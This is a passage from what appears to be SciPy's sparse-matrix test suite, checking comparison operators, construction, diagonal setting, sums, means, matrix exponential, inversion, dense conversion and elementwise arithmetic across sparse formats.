assert_array_equal(dat != dat2, (datsp != datsp2).todense())
# mix sparse types
assert_array_equal(dat != dat2, (datbsr != datsp2).todense())
assert_array_equal(dat != dat2, (datcsc != datsp2).todense())
assert_array_equal(dat != dat2, (datcsr != datsp2).todense())
assert_array_equal(dat != dat2, (datlil != datsp2).todense())
# sparse/dense
assert_array_equal(dat != datsp2, datsp2 != dat)
# sparse/scalar
assert_array_equal(dat != 0, (datsp != 0).todense())
assert_array_equal(dat != 1, (datsp != 1).todense())
assert_array_equal(0 != dat, (0 != datsp).todense())
assert_array_equal(1 != dat, (1 != datsp).todense())
assert_array_equal(dat != np.nan, (datsp != np.nan).todense())
msg = "Bool comparisons only implemented for BSR, CSC, and CSR."
fails = not isinstance(self, (TestBSR, TestCSC, TestCSR))
for dtype in self.checked_dtypes:
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=np.ComplexWarning)
warnings.simplefilter("ignore", category=SparseEfficiencyWarning)
yield dec.skipif(fails, msg)(check), dtype
def test_lt(self):
def check(dtype):
# data
dat = self.dat_dtypes[dtype]
datsp = self.datsp_dtypes[dtype]
dat2 = dat.copy()
dat2[:,0] = 0
datsp2 = self.spmatrix(dat2)
datcomplex = dat.astype(complex)
datcomplex[:,0] = 1 + 1j
datspcomplex = self.spmatrix(datcomplex)
datbsr = bsr_matrix(dat)
datcsc = csc_matrix(dat)
datcsr = csr_matrix(dat)
datlil = lil_matrix(dat)
# sparse/sparse
assert_array_equal(dat < dat2, (datsp < datsp2).todense())
assert_array_equal(datcomplex < dat2, (datspcomplex < datsp2).todense())
# mix sparse types
assert_array_equal(dat < dat2, (datbsr < datsp2).todense())
assert_array_equal(dat < dat2, (datcsc < datsp2).todense())
assert_array_equal(dat < dat2, (datcsr < datsp2).todense())
assert_array_equal(dat < dat2, (datlil < datsp2).todense())
assert_array_equal(dat2 < dat, (datsp2 < datbsr).todense())
assert_array_equal(dat2 < dat, (datsp2 < datcsc).todense())
assert_array_equal(dat2 < dat, (datsp2 < datcsr).todense())
assert_array_equal(dat2 < dat, (datsp2 < datlil).todense())
# sparse/dense
assert_array_equal(dat < dat2, datsp < dat2)
assert_array_equal(datcomplex < dat2, datspcomplex < dat2)
# sparse/scalar
assert_array_equal((datsp < 2).todense(), dat < 2)
assert_array_equal((datsp < 1).todense(), dat < 1)
assert_array_equal((datsp < 0).todense(), dat < 0)
assert_array_equal((datsp < -1).todense(), dat < -1)
assert_array_equal((datsp < -2).todense(), dat < -2)
with np.errstate(invalid='ignore'):
assert_array_equal((datsp < np.nan).todense(), dat < np.nan)
assert_array_equal((2 < datsp).todense(), 2 < dat)
assert_array_equal((1 < datsp).todense(), 1 < dat)
assert_array_equal((0 < datsp).todense(), 0 < dat)
assert_array_equal((-1 < datsp).todense(), -1 < dat)
assert_array_equal((-2 < datsp).todense(), -2 < dat)
if NumpyVersion(np.__version__) >= '1.8.0':
# data
dat = self.dat_dtypes[dtype]
datsp = self.datsp_dtypes[dtype]
dat2 = dat.copy()
dat2[:,0] = 0
datsp2 = self.spmatrix(dat2)
# dense rhs
assert_array_equal(dat < datsp2, datsp < dat2)
msg = "Bool comparisons only implemented for BSR, CSC, and CSR."
fails = not isinstance(self, (TestBSR, TestCSC, TestCSR))
for dtype in self.checked_dtypes:
with warnings.catch_warnings():
with np.errstate(invalid='ignore'):
warnings.simplefilter("ignore", category=np.ComplexWarning)
warnings.simplefilter("ignore", category=SparseEfficiencyWarning)
yield dec.skipif(fails, msg)(check), dtype
def test_gt(self):
def check(dtype):
dat = self.dat_dtypes[dtype]
datsp = self.datsp_dtypes[dtype]
dat2 = dat.copy()
dat2[:,0] = 0
datsp2 = self.spmatrix(dat2)
datcomplex = dat.astype(complex)
datcomplex[:,0] = 1 + 1j
datspcomplex = self.spmatrix(datcomplex)
datbsr = bsr_matrix(dat)
datcsc = csc_matrix(dat)
datcsr = csr_matrix(dat)
datlil = lil_matrix(dat)
# sparse/sparse
assert_array_equal(dat > dat2, (datsp > datsp2).todense())
assert_array_equal(datcomplex > dat2, (datspcomplex > datsp2).todense())
# mix sparse types
assert_array_equal(dat > dat2, (datbsr > datsp2).todense())
assert_array_equal(dat > dat2, (datcsc > datsp2).todense())
assert_array_equal(dat > dat2, (datcsr > datsp2).todense())
assert_array_equal(dat > dat2, (datlil > datsp2).todense())
assert_array_equal(dat2 > dat, (datsp2 > datbsr).todense())
assert_array_equal(dat2 > dat, (datsp2 > datcsc).todense())
assert_array_equal(dat2 > dat, (datsp2 > datcsr).todense())
assert_array_equal(dat2 > dat, (datsp2 > datlil).todense())
# sparse/dense
assert_array_equal(dat > dat2, datsp > dat2)
assert_array_equal(datcomplex > dat2, datspcomplex > dat2)
# sparse/scalar
assert_array_equal((datsp > 2).todense(), dat > 2)
assert_array_equal((datsp > 1).todense(), dat > 1)
assert_array_equal((datsp > 0).todense(), dat > 0)
assert_array_equal((datsp > -1).todense(), dat > -1)
assert_array_equal((datsp > -2).todense(), dat > -2)
with np.errstate(invalid='ignore'):
assert_array_equal((datsp > np.nan).todense(), dat > np.nan)
assert_array_equal((2 > datsp).todense(), 2 > dat)
assert_array_equal((1 > datsp).todense(), 1 > dat)
assert_array_equal((0 > datsp).todense(), 0 > dat)
assert_array_equal((-1 > datsp).todense(), -1 > dat)
assert_array_equal((-2 > datsp).todense(), -2 > dat)
if NumpyVersion(np.__version__) >= '1.8.0':
# data
dat = self.dat_dtypes[dtype]
datsp = self.datsp_dtypes[dtype]
dat2 = dat.copy()
dat2[:,0] = 0
datsp2 = self.spmatrix(dat2)
# dense rhs
assert_array_equal(dat > datsp2, datsp > dat2)
msg = "Bool comparisons only implemented for BSR, CSC, and CSR."
fails = not isinstance(self, (TestBSR, TestCSC, TestCSR))
for dtype in self.checked_dtypes:
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=np.ComplexWarning)
warnings.simplefilter("ignore", category=SparseEfficiencyWarning)
yield dec.skipif(fails, msg)(check), dtype
def test_le(self):
def check(dtype):
dat = self.dat_dtypes[dtype]
datsp = self.datsp_dtypes[dtype]
dat2 = dat.copy()
dat2[:,0] = 0
datsp2 = self.spmatrix(dat2)
datcomplex = dat.astype(complex)
datcomplex[:,0] = 1 + 1j
datspcomplex = self.spmatrix(datcomplex)
datbsr = bsr_matrix(dat)
datcsc = csc_matrix(dat)
datcsr = csr_matrix(dat)
datlil = lil_matrix(dat)
# sparse/sparse
assert_array_equal(dat <= dat2, (datsp <= datsp2).todense())
assert_array_equal(datcomplex <= dat2, (datspcomplex <= datsp2).todense())
# mix sparse types
assert_array_equal((datbsr <= datsp2).todense(), dat <= dat2)
assert_array_equal((datcsc <= datsp2).todense(), dat <= dat2)
assert_array_equal((datcsr <= datsp2).todense(), dat <= dat2)
assert_array_equal((datlil <= datsp2).todense(), dat <= dat2)
assert_array_equal((datsp2 <= datbsr).todense(), dat2 <= dat)
assert_array_equal((datsp2 <= datcsc).todense(), dat2 <= dat)
assert_array_equal((datsp2 <= datcsr).todense(), dat2 <= dat)
assert_array_equal((datsp2 <= datlil).todense(), dat2 <= dat)
# sparse/dense
assert_array_equal(datsp <= dat2, dat <= dat2)
assert_array_equal(datspcomplex <= dat2, datcomplex <= dat2)
# sparse/scalar
assert_array_equal((datsp <= 2).todense(), dat <= 2)
assert_array_equal((datsp <= 1).todense(), dat <= 1)
assert_array_equal((datsp <= -1).todense(), dat <= -1)
assert_array_equal((datsp <= -2).todense(), dat <= -2)
assert_array_equal((2 <= datsp).todense(), 2 <= dat)
assert_array_equal((1 <= datsp).todense(), 1 <= dat)
assert_array_equal((-1 <= datsp).todense(), -1 <= dat)
assert_array_equal((-2 <= datsp).todense(), -2 <= dat)
if NumpyVersion(np.__version__) >= '1.8.0':
# data
dat = self.dat_dtypes[dtype]
datsp = self.datsp_dtypes[dtype]
dat2 = dat.copy()
dat2[:,0] = 0
datsp2 = self.spmatrix(dat2)
# dense rhs
assert_array_equal(dat <= datsp2, datsp <= dat2)
msg = "Bool comparisons only implemented for BSR, CSC, and CSR."
fails = not isinstance(self, (TestBSR, TestCSC, TestCSR))
for dtype in self.checked_dtypes:
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=np.ComplexWarning)
warnings.simplefilter("ignore", category=SparseEfficiencyWarning)
yield dec.skipif(fails, msg)(check), dtype
def test_ge(self):
def check(dtype):
dat = self.dat_dtypes[dtype]
datsp = self.datsp_dtypes[dtype]
dat2 = dat.copy()
dat2[:,0] = 0
datsp2 = self.spmatrix(dat2)
datcomplex = dat.astype(complex)
datcomplex[:,0] = 1 + 1j
datspcomplex = self.spmatrix(datcomplex)
datbsr = bsr_matrix(dat)
datcsc = csc_matrix(dat)
datcsr = csr_matrix(dat)
datlil = lil_matrix(dat)
# sparse/sparse
assert_array_equal(dat >= dat2, (datsp >= datsp2).todense())
assert_array_equal(datcomplex >= dat2, (datspcomplex >= datsp2).todense())
            # mix sparse types
assert_array_equal((datbsr >= datsp2).todense(), dat >= dat2)
assert_array_equal((datcsc >= datsp2).todense(), dat >= dat2)
assert_array_equal((datcsr >= datsp2).todense(), dat >= dat2)
assert_array_equal((datlil >= datsp2).todense(), dat >= dat2)
assert_array_equal((datsp2 >= datbsr).todense(), dat2 >= dat)
assert_array_equal((datsp2 >= datcsc).todense(), dat2 >= dat)
assert_array_equal((datsp2 >= datcsr).todense(), dat2 >= dat)
assert_array_equal((datsp2 >= datlil).todense(), dat2 >= dat)
# sparse/dense
assert_array_equal(datsp >= dat2, dat >= dat2)
assert_array_equal(datspcomplex >= dat2, datcomplex >= dat2)
# sparse/scalar
assert_array_equal((datsp >= 2).todense(), dat >= 2)
assert_array_equal((datsp >= 1).todense(), dat >= 1)
assert_array_equal((datsp >= -1).todense(), dat >= -1)
assert_array_equal((datsp >= -2).todense(), dat >= -2)
assert_array_equal((2 >= datsp).todense(), 2 >= dat)
assert_array_equal((1 >= datsp).todense(), 1 >= dat)
assert_array_equal((-1 >= datsp).todense(), -1 >= dat)
assert_array_equal((-2 >= datsp).todense(), -2 >= dat)
if NumpyVersion(np.__version__) >= '1.8.0':
# dense data
dat = self.dat_dtypes[dtype]
datsp = self.datsp_dtypes[dtype]
dat2 = dat.copy()
dat2[:,0] = 0
datsp2 = self.spmatrix(dat2)
# dense rhs
assert_array_equal(dat >= datsp2, datsp >= dat2)
msg = "Bool comparisons only implemented for BSR, CSC, and CSR."
fails = not isinstance(self, (TestBSR, TestCSC, TestCSR))
for dtype in self.checked_dtypes:
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=np.ComplexWarning)
warnings.simplefilter("ignore", category=SparseEfficiencyWarning)
yield dec.skipif(fails, msg)(check), dtype
def test_empty(self):
# create empty matrices
assert_equal(self.spmatrix((3,3)).todense(), np.zeros((3,3)))
assert_equal(self.spmatrix((3,3)).nnz, 0)
def test_invalid_shapes(self):
assert_raises(ValueError, self.spmatrix, (-1,3))
assert_raises(ValueError, self.spmatrix, (3,-1))
assert_raises(ValueError, self.spmatrix, (-1,-1))
def test_repr(self):
repr(self.datsp)
def test_str(self):
str(self.datsp)
def test_empty_arithmetic(self):
# Test manipulating empty matrices. Fails in SciPy SVN <= r1768
shape = (5, 5)
for mytype in [np.dtype('int32'), np.dtype('float32'),
np.dtype('float64'), np.dtype('complex64'),
np.dtype('complex128')]:
a = self.spmatrix(shape, dtype=mytype)
b = a + a
c = 2 * a
d = a * a.tocsc()
e = a * a.tocsr()
f = a * a.tocoo()
for m in [a,b,c,d,e,f]:
assert_equal(m.A, a.A*a.A)
# These fail in all revisions <= r1768:
assert_equal(m.dtype,mytype)
assert_equal(m.A.dtype,mytype)
def test_abs(self):
A = matrix([[-1, 0, 17],[0, -5, 0],[1, -4, 0],[0,0,0]],'d')
assert_equal(abs(A),abs(self.spmatrix(A)).todense())
def test_elementwise_power(self):
A = matrix([[-4, -3, -2],[-1, 0, 1],[2, 3, 4]], 'd')
assert_equal(np.power(A, 2), self.spmatrix(A).power(2).todense())
#it's element-wise power function, input has to be a scalar
assert_raises(NotImplementedError, self.spmatrix(A).power, A)
def test_neg(self):
A = matrix([[-1, 0, 17],[0, -5, 0],[1, -4, 0],[0,0,0]],'d')
assert_equal(-A,(-self.spmatrix(A)).todense())
def test_real(self):
D = matrix([[1 + 3j, 2 - 4j]])
A = self.spmatrix(D)
assert_equal(A.real.todense(),D.real)
def test_imag(self):
D = matrix([[1 + 3j, 2 - 4j]])
A = self.spmatrix(D)
assert_equal(A.imag.todense(),D.imag)
def test_diagonal(self):
# Does the matrix's .diagonal() method work?
mats = []
mats.append([[1,0,2]])
mats.append([[1],[0],[2]])
mats.append([[0,1],[0,2],[0,3]])
mats.append([[0,0,1],[0,0,2],[0,3,0]])
mats.append(kron(mats[0],[[1,2]]))
mats.append(kron(mats[0],[[1],[2]]))
mats.append(kron(mats[1],[[1,2],[3,4]]))
mats.append(kron(mats[2],[[1,2],[3,4]]))
mats.append(kron(mats[3],[[1,2],[3,4]]))
mats.append(kron(mats[3],[[1,2,3,4]]))
for m in mats:
assert_equal(self.spmatrix(m).diagonal(),diag(m))
@dec.slow
def test_setdiag(self):
def dense_setdiag(a, v, k):
v = np.asarray(v)
if k >= 0:
n = min(a.shape[0], a.shape[1] - k)
if v.ndim != 0:
n = min(n, len(v))
v = v[:n]
i = np.arange(0, n)
j = np.arange(k, k + n)
a[i,j] = v
elif k < 0:
dense_setdiag(a.T, v, -k)
return
def check_setdiag(a, b, k):
# Check setting diagonal using a scalar, a vector of
# correct length, and too short or too long vectors
for r in [-1, len(np.diag(a, k)), 2, 30]:
if r < 0:
v = int(np.random.randint(1, 20, size=1))
else:
v = np.random.randint(1, 20, size=r)
dense_setdiag(a, v, k)
b.setdiag(v, k)
# check that dense_setdiag worked
d = np.diag(a, k)
if np.asarray(v).ndim == 0:
assert_array_equal(d, v, err_msg=msg + " %d" % (r,))
else:
n = min(len(d), len(v))
assert_array_equal(d[:n], v[:n], err_msg=msg + " %d" % (r,))
# check that sparse setdiag worked
assert_array_equal(b.A, a, err_msg=msg + " %d" % (r,))
# comprehensive test
np.random.seed(1234)
for dtype in [np.int8, np.float64]:
for m in [0, 1, 3, 10]:
for n in [0, 1, 3, 10]:
for k in range(-m+1, n-1):
msg = repr((dtype, m, n, k))
a = np.zeros((m, n), dtype=dtype)
b = self.spmatrix((m, n), dtype=dtype)
check_setdiag(a, b, k)
# check overwriting etc
for k2 in np.random.randint(-m+1, n-1, size=12):
check_setdiag(a, b, k2)
# simpler test case
m = self.spmatrix(np.eye(3))
values = [3, 2, 1]
assert_raises(ValueError, m.setdiag, values, k=4)
m.setdiag(values)
assert_array_equal(m.diagonal(), values)
m.setdiag(values, k=1)
assert_array_equal(m.A, np.array([[3, 3, 0],
[0, 2, 2],
[0, 0, 1]]))
m.setdiag(values, k=-2)
assert_array_equal(m.A, np.array([[3, 3, 0],
[0, 2, 2],
[3, 0, 1]]))
m.setdiag((9,), k=2)
assert_array_equal(m.A[0,2], 9)
m.setdiag((9,), k=-2)
assert_array_equal(m.A[2,0], 9)
def test_nonzero(self):
A = array([[1, 0, 1],[0, 1, 1],[0, 0, 1]])
Asp = self.spmatrix(A)
A_nz = set([tuple(ij) for ij in transpose(A.nonzero())])
Asp_nz = set([tuple(ij) for ij in transpose(Asp.nonzero())])
assert_equal(A_nz, Asp_nz)
def test_getrow(self):
assert_array_equal(self.datsp.getrow(1).todense(), self.dat[1,:])
assert_array_equal(self.datsp.getrow(-1).todense(), self.dat[-1,:])
def test_getcol(self):
assert_array_equal(self.datsp.getcol(1).todense(), self.dat[:,1])
assert_array_equal(self.datsp.getcol(-1).todense(), self.dat[:,-1])
def test_sum(self):
np.random.seed(1234)
dat_1 = np.matrix([[0, 1, 2],
[3, -4, 5],
[-6, 7, 9]])
dat_2 = np.random.rand(40, 40)
dat_3 = np.array([[]])
dat_4 = np.zeros((40, 40))
dat_5 = sparse.rand(40, 40, density=1e-2).A
matrices = [dat_1, dat_2, dat_3, dat_4, dat_5]
def check(dtype, j):
dat = np.matrix(matrices[j], dtype=dtype)
datsp = self.spmatrix(dat, dtype=dtype)
assert_array_almost_equal(dat.sum(), datsp.sum())
assert_equal(dat.sum().dtype, datsp.sum().dtype)
assert_array_almost_equal(dat.sum(axis=None), datsp.sum(axis=None))
assert_equal(dat.sum(axis=None).dtype, datsp.sum(axis=None).dtype)
assert_array_almost_equal(dat.sum(axis=0), datsp.sum(axis=0))
assert_equal(dat.sum(axis=0).dtype, datsp.sum(axis=0).dtype)
assert_array_almost_equal(dat.sum(axis=1), datsp.sum(axis=1))
assert_equal(dat.sum(axis=1).dtype, datsp.sum(axis=1).dtype)
if NumpyVersion(np.__version__) >= '1.7.0':
# np.matrix.sum with negative axis arg doesn't work for < 1.7
assert_array_almost_equal(dat.sum(axis=-2), datsp.sum(axis=-2))
assert_equal(dat.sum(axis=-2).dtype, datsp.sum(axis=-2).dtype)
assert_array_almost_equal(dat.sum(axis=-1), datsp.sum(axis=-1))
assert_equal(dat.sum(axis=-1).dtype, datsp.sum(axis=-1).dtype)
for dtype in self.checked_dtypes:
for j in range(len(matrices)):
yield check, dtype, j
def test_mean(self):
def check(dtype):
dat = np.matrix([[0, 1, 2],
[3, -4, 5],
[-6, 7, 9]], dtype=dtype)
datsp = self.spmatrix(dat, dtype=dtype)
assert_array_almost_equal(dat.mean(), datsp.mean())
assert_equal(dat.mean().dtype, datsp.mean().dtype)
assert_array_almost_equal(dat.mean(axis=None), datsp.mean(axis=None))
assert_equal(dat.mean(axis=None).dtype, datsp.mean(axis=None).dtype)
assert_array_almost_equal(dat.mean(axis=0), datsp.mean(axis=0))
assert_equal(dat.mean(axis=0).dtype, datsp.mean(axis=0).dtype)
assert_array_almost_equal(dat.mean(axis=1), datsp.mean(axis=1))
assert_equal(dat.mean(axis=1).dtype, datsp.mean(axis=1).dtype)
if NumpyVersion(np.__version__) >= '1.7.0':
# np.matrix.sum with negative axis arg doesn't work for < 1.7
assert_array_almost_equal(dat.mean(axis=-2), datsp.mean(axis=-2))
assert_equal(dat.mean(axis=-2).dtype, datsp.mean(axis=-2).dtype)
assert_array_almost_equal(dat.mean(axis=-1), datsp.mean(axis=-1))
assert_equal(dat.mean(axis=-1).dtype, datsp.mean(axis=-1).dtype)
for dtype in self.checked_dtypes:
yield check, dtype
def test_expm(self):
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=SparseEfficiencyWarning)
M = array([[1, 0, 2], [0, 0, 3], [-4, 5, 6]], float)
sM = self.spmatrix(M, shape=(3,3), dtype=float)
Mexp = scipy.linalg.expm(M)
sMexp = expm(sM).todense()
assert_array_almost_equal((sMexp - Mexp), zeros((3, 3)))
N = array([[3., 0., 1.], [0., 2., 0.], [0., 0., 0.]])
sN = self.spmatrix(N, shape=(3,3), dtype=float)
Nexp = scipy.linalg.expm(N)
sNexp = expm(sN).todense()
assert_array_almost_equal((sNexp - Nexp), zeros((3, 3)))
def test_inv(self):
def check(dtype):
M = array([[1, 0, 2], [0, 0, 3], [-4, 5, 6]], dtype)
sM = self.spmatrix(M, shape=(3,3), dtype=dtype)
sMinv = inv(sM)
assert_array_almost_equal(sMinv.dot(sM).todense(), np.eye(3))
for dtype in [float]:
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=SparseEfficiencyWarning)
yield check, dtype
def test_from_array(self):
A = array([[1,0,0],[2,3,4],[0,5,0],[0,0,0]])
assert_array_equal(self.spmatrix(A).toarray(), A)
A = array([[1.0 + 3j, 0, 0],
[0, 2.0 + 5, 0],
[0, 0, 0]])
assert_array_equal(self.spmatrix(A).toarray(), A)
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=np.ComplexWarning)
assert_array_equal(self.spmatrix(A, dtype='int16').toarray(), A.astype('int16'))
def test_from_matrix(self):
A = matrix([[1,0,0],[2,3,4],[0,5,0],[0,0,0]])
assert_array_equal(self.spmatrix(A).todense(), A)
A = matrix([[1.0 + 3j, 0, 0],
[0, 2.0 + 5, 0],
[0, 0, 0]])
assert_array_equal(self.spmatrix(A).toarray(), A)
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=np.ComplexWarning)
assert_array_equal(self.spmatrix(A, dtype='int16').toarray(), A.astype('int16'))
def test_from_list(self):
A = [[1,0,0],[2,3,4],[0,5,0],[0,0,0]]
assert_array_equal(self.spmatrix(A).todense(), A)
A = [[1.0 + 3j, 0, 0],
[0, 2.0 + 5, 0],
[0, 0, 0]]
assert_array_equal(self.spmatrix(A).toarray(), array(A))
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=np.ComplexWarning)
assert_array_equal(self.spmatrix(A, dtype='int16').todense(), array(A).astype('int16'))
def test_from_sparse(self):
D = array([[1,0,0],[2,3,4],[0,5,0],[0,0,0]])
S = csr_matrix(D)
assert_array_equal(self.spmatrix(S).toarray(), D)
S = self.spmatrix(D)
assert_array_equal(self.spmatrix(S).toarray(), D)
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=np.ComplexWarning)
D = array([[1.0 + 3j, 0, 0],
[0, 2.0 + 5, 0],
[0, 0, 0]])
S = csr_matrix(D)
assert_array_equal(self.spmatrix(S).toarray(), D)
assert_array_equal(self.spmatrix(S, dtype='int16').toarray(), D.astype('int16'))
S = self.spmatrix(D)
assert_array_equal(self.spmatrix(S).toarray(), D)
assert_array_equal(self.spmatrix(S, dtype='int16').toarray(), D.astype('int16'))
# def test_array(self):
# """test array(A) where A is in sparse format"""
# assert_equal( array(self.datsp), self.dat )
def test_todense(self):
# Check C-contiguous (default).
chk = self.datsp.todense()
assert_array_equal(chk, self.dat)
assert_(chk.flags.c_contiguous)
assert_(not chk.flags.f_contiguous)
# Check C-contiguous (with arg).
chk = self.datsp.todense(order='C')
assert_array_equal(chk, self.dat)
assert_(chk.flags.c_contiguous)
assert_(not chk.flags.f_contiguous)
# Check F-contiguous (with arg).
chk = self.datsp.todense(order='F')
assert_array_equal(chk, self.dat)
assert_(not chk.flags.c_contiguous)
assert_(chk.flags.f_contiguous)
# Check with out argument (array).
out = np.zeros(self.datsp.shape, dtype=self.datsp.dtype)
chk = self.datsp.todense(out=out)
assert_array_equal(self.dat, out)
assert_array_equal(self.dat, chk)
assert_(chk.base is out)
# Check with out array (matrix).
out = np.asmatrix(np.zeros(self.datsp.shape, dtype=self.datsp.dtype))
chk = self.datsp.todense(out=out)
assert_array_equal(self.dat, out)
assert_array_equal(self.dat, chk)
assert_(chk is out)
a = matrix([1.,2.,3.])
dense_dot_dense = a * self.dat
check = a * self.datsp.todense()
assert_array_equal(dense_dot_dense, check)
b = matrix([1.,2.,3.,4.]).T
dense_dot_dense = self.dat * b
check2 = self.datsp.todense() * b
assert_array_equal(dense_dot_dense, check2)
# Check bool data works.
spbool = self.spmatrix(self.dat, dtype=bool)
matbool = self.dat.astype(bool)
assert_array_equal(spbool.todense(), matbool)
def test_toarray(self):
# Check C-contiguous (default).
dat = asarray(self.dat)
chk = self.datsp.toarray()
assert_array_equal(chk, dat)
assert_(chk.flags.c_contiguous)
assert_(not chk.flags.f_contiguous)
# Check C-contiguous (with arg).
chk = self.datsp.toarray(order='C')
assert_array_equal(chk, dat)
assert_(chk.flags.c_contiguous)
assert_(not chk.flags.f_contiguous)
# Check F-contiguous (with arg).
chk = self.datsp.toarray(order='F')
assert_array_equal(chk, dat)
assert_(not chk.flags.c_contiguous)
assert_(chk.flags.f_contiguous)
# Check with output arg.
out = np.zeros(self.datsp.shape, dtype=self.datsp.dtype)
self.datsp.toarray(out=out)
assert_array_equal(chk, dat)
# Check that things are fine when we don't initialize with zeros.
out[...] = 1.
self.datsp.toarray(out=out)
assert_array_equal(chk, dat)
a = array([1.,2.,3.])
dense_dot_dense = dot(a, dat)
check = dot(a, self.datsp.toarray())
assert_array_equal(dense_dot_dense, check)
b = array([1.,2.,3.,4.])
dense_dot_dense = dot(dat, b)
check2 = dot(self.datsp.toarray(), b)
assert_array_equal(dense_dot_dense, check2)
# Check bool data works.
spbool = self.spmatrix(self.dat, dtype=bool)
arrbool = dat.astype(bool)
assert_array_equal(spbool.toarray(), arrbool)
def test_astype(self):
D = array([[2.0 + 3j, 0, 0],
[0, 4.0 + 5j, 0],
[0, 0, 0]])
S = self.spmatrix(D)
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=np.ComplexWarning)
for x in supported_dtypes:
assert_equal(S.astype(x).dtype, D.astype(x).dtype) # correct type
assert_equal(S.astype(x).toarray(), D.astype(x)) # correct values
assert_equal(S.astype(x).format, S.format) # format preserved
def test_asfptype(self):
A = self.spmatrix(arange(6,dtype='int32').reshape(2,3))
assert_equal(A.dtype, np.dtype('int32'))
assert_equal(A.asfptype().dtype, np.dtype('float64'))
assert_equal(A.asfptype().format, A.format)
assert_equal(A.astype('int16').asfptype().dtype, np.dtype('float32'))
assert_equal(A.astype('complex128').asfptype().dtype, np.dtype('complex128'))
B = A.asfptype()
C = B.asfptype()
assert_(B is C)
def test_mul_scalar(self):
def check(dtype):
dat = self.dat_dtypes[dtype]
datsp = self.datsp_dtypes[dtype]
assert_array_equal(dat*2,(datsp*2).todense())
assert_array_equal(dat*17.3,(datsp*17.3).todense())
for dtype in self.checked_dtypes:
yield check, dtype
def test_rmul_scalar(self):
def check(dtype):
dat = self.dat_dtypes[dtype]
datsp = self.datsp_dtypes[dtype]
assert_array_equal(2*dat,(2*datsp).todense())
assert_array_equal(17.3*dat,(17.3*datsp).todense())
for dtype in self.checked_dtypes:
yield check, dtype
def test_add(self):
def check(dtype):
dat = self.dat_dtypes[dtype]
datsp = self.datsp_dtypes[dtype]
a = dat.copy()
a[0,2] = 2.0
b = datsp
c = b + a
assert_array_equal(c, b.todense() + a)
c = b + b.tocsr()
assert_array_equal(c.todense(),
b.todense() + b.todense())
for dtype in self.checked_dtypes:
yield check, dtype
def test_radd(self):
def check(dtype):
dat = self.dat_dtypes[dtype]
datsp = self.datsp_dtypes[dtype]
a = dat.copy()
a[0,2] = 2.0
b = datsp
c = a + b
assert_array_equal(c, a + b.todense())
for dtype in self.checked_dtypes:
yield check, dtype
def test_sub(self):
def check(dtype):
dat = self.dat_dtypes[dtype]
datsp = self.datsp_dtypes[dtype]
assert_array_equal((datsp - datsp).todense(),[[0,0,0,0],[0,0,0,0],[0,0,0,0]])
A = self.spmatrix(matrix([[1,0,0,4],[-1,0,0,0],[0,8,0,-5]],'d'))
assert_array_equal((datsp - A).todense(),dat - A.todense())
assert_array_equal((A - datsp).todense(),A.todense() - dat)
for dtype in self.checked_dtypes:
yield check, dtype
def test_rsub(self):
def check(dtype):
dat = self.dat_dtypes[dtype]
datsp = self.datsp_dtypes[dtype]
assert_array_equal((dat - datsp),[[0,0,0,0],[0,0,0,0],[0,0,0,0]])
assert_array_equal((datsp - dat),[[0,0,0,0],[0,0,0,0],[0,0,0,0]])
A = self.spmatrix(matrix([[1,0,0,4],[-1,0,0,0],[0,8,0,-5]],'d'))
assert_array_equal((dat - A),dat - A.todense())
assert_array_equal((A - dat),A.todense() - dat)
assert_array_equal(A.todense() - datsp,A.todense() - dat)
assert_array_equal(datsp - A.todense(),dat - A.todense())
for dtype in self.checked_dtypes:
if (dtype == np.dtype('bool')) and (
NumpyVersion(np.__version__) >= '1.9.0.dev'):
# boolean array subtraction deprecated in 1.9.0
continue
yield check, dtype
def test_add0(self):
def check(dtype):
dat = self.dat_dtypes[dtype]
datsp = self.datsp_dtypes[dtype]
# Adding 0 to a sparse matrix
assert_array_equal((datsp + 0).todense(), dat)
# use sum (which takes 0 as a starting value)
sumS = sum([k * datsp for k in range(1, 3)])
sumD = sum([k * dat for k in range(1, 3)])
assert_almost_equal(sumS.todense(), sumD)
for dtype in self.checked_dtypes:
yield check, dtype
def test_elementwise_multiply(self):
# real/real
A = array([[4,0,9],[2,-3,5]])
B = array([[0,7,0],[0,-4,0]])
Asp = self.spmatrix(A)
Bsp = self.spmatrix(B)
assert_almost_equal(Asp.multiply(Bsp).todense(), A*B) # sparse/sparse
assert_almost_equal(Asp.multiply(B).todense(), A*B) # sparse/dense
# complex/complex
C = array([[1-2j,0+5j,-1+0j],[4-3j,-3+6j,5]])
D = array([[5+2j,7-3j,-2+1j],[0-1j,-4+2j,9]])
Csp = self.spmatrix(C)
Dsp = self.spmatrix(D)
assert_almost_equal(Csp.multiply(Dsp).todense(), C*D) # sparse/sparse
assert_almost_equal(Csp.multiply(D).todense(), C*D) # sparse/dense
# real/complex
assert_almost_equal(Asp.multiply(Dsp).todense(), A*D) # sparse/sparse
assert_almost_equal(Asp.multiply(D).todense(), A*D) # sparse/dense
def test_elementwise_multiply_broadcast(self):
A = array([4])
B = array([[-9]])
C = array([1,-1,0])
D = array([[7,9,-9]])
E = array([[3],[2],[1]])
F = array([[8,6,3],[-4,3,2],[6,6,6]])
G = [1, 2, 3]
H = np.ones((3, 4))
J = H.T
# Rank 1 arrays can't be cast as spmatrices (A and C) so leave
# them out.
Bsp = self.spmatrix(B)
Dsp = self.spmatrix(D)
Esp = self.spmatrix(E)
Fsp = self.spmatrix(F)
Hsp = self.spmatrix(H)
Hspp = self.spmatrix(H[0,None])
Jsp = self.spmatrix(J)
Jspp = self.spmatrix(J[:,0,None])
matrices = [A, B, C, D, E, F, G, H, J]
spmatrices = [Bsp, Dsp, Esp, Fsp, Hsp, Hspp, Jsp, Jspp]
# sparse/sparse
for i in spmatrices:
for j in spmatrices:
try:
dense_mult = np.multiply(i.todense(), j.todense())
except ValueError:
assert_raises(ValueError, i.multiply, j)
continue
sp_mult = i.multiply(j)
if isspmatrix(sp_mult):
assert_almost_equal(sp_mult.todense(), dense_mult)
else:
assert_almost_equal(sp_mult, dense_mult)
# sparse/dense
for i in spmatrices:
for j in matrices:
try:
dense_mult = np.multiply(i.todense(), j)
except ValueError:
